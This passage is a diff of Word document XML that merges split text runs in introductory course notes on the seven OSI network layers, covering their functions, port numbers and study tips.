         </w:rPr>
-        <w:t xml:space="preserve">Packet received from Network layer is further divided into frames depending on the frame size of </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>NIC(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Network Interface Card). DLL also encapsulates Sender and Receiver’s MAC address in the header.</w:t>
+        <w:t>Packet received from Network layer is further divided into frames depending on the frame size of NIC(Network Interface Card). DLL also encapsulates Sender and Receiver’s MAC address in the header.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -832,18 +734,8 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:br/>
-        <w:t xml:space="preserve">The functions of the data Link layer </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>are :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>The functions of the data Link layer are :</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -970,25 +862,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> The data rate must be constant on both sides else the data may get corrupted </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>thus ,</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> flow control coordinates that amount of data that can be sent before receiving acknowledgement.</w:t>
+        <w:t xml:space="preserve"> The data rate must be constant on both sides else the data may get corrupted thus , flow control coordinates that amount of data that can be sent before receiving acknowledgement.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1118,20 +992,8 @@
           <w:sz w:val="27"/>
           <w:szCs w:val="27"/>
         </w:rPr>
-        <w:t>3. Network Layer (Layer 3</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="27"/>
-          <w:szCs w:val="27"/>
-        </w:rPr>
-        <w:t>) :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>3. Network Layer (Layer 3) :</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1157,18 +1019,8 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:br/>
-        <w:t xml:space="preserve">The functions of the Network layer </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>are :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>The functions of the Network layer are :</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1383,55 +1235,61 @@
           <w:sz w:val="27"/>
           <w:szCs w:val="27"/>
         </w:rPr>
-        <w:t>4. Transport Layer (Layer 4</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
+        <w:t>4. Transport Layer (Layer 4) :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Transport layer provides services to application layer and takes services from network layer. The data in the transport layer is referred to as </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Segments</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>. It is responsible for the End to End delivery of the complete message. Transport layer also provides the acknowledgement of the successful data transmission and re-transmits the data if error is found.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
-          <w:sz w:val="27"/>
-          <w:szCs w:val="27"/>
-        </w:rPr>
-        <w:t>) :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Transport layer provides services to application layer and takes services from network layer. The data in the transport layer is referred to as </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Segments</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>. It is responsible for the End to End delivery of the complete message. Transport layer also provides the acknowledgement of the successful data transmission and re-transmits the data if error is found.</w:t>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">• At sender’s side: </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1440,6 +1298,7 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:br/>
+        <w:t xml:space="preserve">Transport layer receives the formatted data from the upper layers, performs </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1449,16 +1308,15 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">• At sender’s side: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:br/>
-        <w:t xml:space="preserve">Transport layer receives the formatted data from the upper layers, performs </w:t>
+        <w:t>Segmentation</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and also implements </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1468,15 +1326,57 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Segmentation</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> and also implements </w:t>
+        <w:t>Flow &amp; Error control</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to ensure proper data transmission. It also adds Source and Destination port number in its header and forwards the segmented data to the Network Layer.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Note:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> The sender need to know the port number associated with the receiver’s application.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>Generally this destination port number is configured, either by default or manually. For example, when a web application makes a request to a web server, it typically uses port number 80, because this is the default port assigned to web applications. Many applications have default port assigned.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:br/>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1486,80 +1386,8 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Flow &amp; Error control</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> to ensure proper data transmission. It also adds Source and Destination port number in its header and forwards the segmented data to the Network Layer.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>Note:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> The sender need to know the port number associated with the receiver’s application.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>Generally this destination port number is configured, either by default or manually. For example, when a web application makes a request to a web server, it typically uses port number 80, because this is the default port assigned to web applications. Many applications have default port assigned.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>• At receiver’s side</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>• At receiver’s side:</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1586,18 +1414,8 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">The functions of the transport layer </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>are :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>The functions of the transport layer are :</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1628,25 +1446,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> This layer accepts the message from the (session) </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>layer ,</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> breaks the message into smaller units . Each of the segment produced has a header associated with it. The transport layer at the destination station reassembles the message.</w:t>
+        <w:t xml:space="preserve"> This layer accepts the message from the (session) layer , breaks the message into smaller units . Each of the segment produced has a header associated with it. The transport layer at the destination station reassembles the message.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1696,18 +1496,8 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">The services provided by transport </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>layer :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>The services provided by transport layer :</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1925,20 +1715,8 @@
           <w:sz w:val="27"/>
           <w:szCs w:val="27"/>
         </w:rPr>
-        <w:t>5. Session Layer (Layer 5</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="27"/>
-          <w:szCs w:val="27"/>
-        </w:rPr>
-        <w:t>) :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>5. Session Layer (Layer 5) :</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1964,18 +1742,8 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:br/>
-        <w:t xml:space="preserve">The functions of the session layer </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>are :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>The functions of the session layer are :</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2022,7 +1790,6 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2033,7 +1800,6 @@
         </w:rPr>
         <w:t>Synchronization :</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2064,20 +1830,8 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Dialog </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Controller :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>Dialog Controller :</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2188,19 +1942,8 @@
           <w:szCs w:val="24"/>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t>SCENARIO</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>SCENARIO:</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2305,43 +2048,31 @@
           <w:sz w:val="27"/>
           <w:szCs w:val="27"/>
         </w:rPr>
-        <w:t>6. Presentation Layer (Layer 6</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
+        <w:t>6. Presentation Layer (Layer 6) :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Presentation layer is also called the </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
-          <w:sz w:val="27"/>
-          <w:szCs w:val="27"/>
-        </w:rPr>
-        <w:t>) :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Presentation layer is also called the </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -2362,18 +2093,8 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:br/>
-        <w:t xml:space="preserve">The functions of the presentation layer </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>are :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>The functions of the presentation layer are :</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2388,7 +2109,6 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2399,7 +2119,6 @@
         </w:rPr>
         <w:t>Translation :</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2430,20 +2149,8 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Encryption/ </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Decryption :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>Encryption/ Decryption :</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2515,20 +2222,8 @@
           <w:sz w:val="27"/>
           <w:szCs w:val="27"/>
         </w:rPr>
-        <w:t>7. Application Layer (Layer 7</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="27"/>
-          <w:szCs w:val="27"/>
-        </w:rPr>
-        <w:t>) :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>7. Application Layer (Layer 7) :</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2554,18 +2249,8 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:br/>
-        <w:t>Ex: Application – Browsers, Skype Messenger etc</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>Ex: Application – Browsers, Skype Messenger etc.</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2667,18 +2352,8 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">The functions of the Application layer </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>are :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>The functions of the Application layer are :</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2819,15 +2494,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Don’t look at these layers as some layers in network, </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>These</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> layers actually describe or brief how the network works.</w:t>
+        <w:t>Don’t look at these layers as some layers in network, These layers actually describe or brief how the network works.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2851,15 +2518,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">The most important thing look at these layers physically in real world with an </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>example ,</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> only then you will be understanding each layers.</w:t>
+        <w:t>The most important thing look at these layers physically in real world with an example , only then you will be understanding each layers.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2973,15 +2632,7 @@
         <w:t>Hubs:</w:t>
       </w:r>
       <w:r>
